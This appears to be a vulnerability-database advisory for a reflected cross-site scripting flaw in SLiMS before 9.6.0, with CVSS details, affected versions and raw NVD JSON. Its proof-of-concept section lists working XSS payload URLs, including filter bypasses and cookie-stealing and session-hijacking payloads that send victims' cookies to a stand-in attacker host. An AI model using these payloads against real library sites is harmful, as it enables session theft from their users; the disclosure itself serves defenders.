Security Vulnerability Report
中文
CVE-2025-65233 CVSS 6.1 MEDIUM

CVE-2025-65233

Published: 2025-12-17 20:15:56
Last Modified: 2026-01-05 14:26:20

Description

Reflected cross-site scripting (XSS) in SLiMS (slims9_bulian) before 9.6.0 via improper handling of $_SERVER['PHP_SELF' ] in index.php/sysconfig.inc.php, which allows remote attackers to execute arbitrary JavaScript in a victim's browser by supplying a crafted URL path.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:slims_project:slims:*:*:*:*:*:*:*:* - VULNERABLE
SLiMS (slims9_bulian) < 9.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Reflected XSS PoC for CVE-2025-65233 --> <!-- Target: SLiMS (slims9_bulian) < 9.6.0 --> <!-- Attack Vector: Malicious URL path via $_SERVER['PHP_SELF'] --> <!-- Basic XSS PoC --> http://target/slims9/index.php/<script>alert(document.cookie)</script> <!-- Bypassing filters with various encoding techniques --> http://target/slims9/index.php/"><script>alert('XSS')</script> http://target/slims9/index.php/'><img src=x onerror=alert(1)> http://target/slims9/index.php/"><svg onload=alert(document.domain)> <!-- Cookie stealing PoC --> http://target/slims9/index.php/<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> <!-- Session hijacking PoC --> http://target/slims9/index.php/<script>document.location='https://attacker.com/phishing?session='+btoa(document.cookie)</script> <!-- Using the vulnerable endpoint sysconfig.inc.php --> http://target/slims9/sysconfig.inc.php/<script>eval(atob('YWxlcnQoMSk='))</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65233", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:55.647", "lastModified": "2026-01-05T14:26:20.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reflected cross-site scripting (XSS) in SLiMS (slims9_bulian) before 9.6.0 via improper handling of $_SERVER['PHP_SELF' ] in index.php/sysconfig.inc.php, which allows remote attackers to execute arbitrary JavaScript in a victim's browser by supplying a crafted URL path."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:slims_project:slims:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.6.0", "matchCriteriaId": "F72C54A3-BFC6-4CA9-8D07-0081A7DAEDC7"}]}]}], "references": [{"url": "https://github.com/hbtw25/vulnerability-research/tree/main/CVE-2025-65233", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/slims/slims9_bulian/issues/185", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}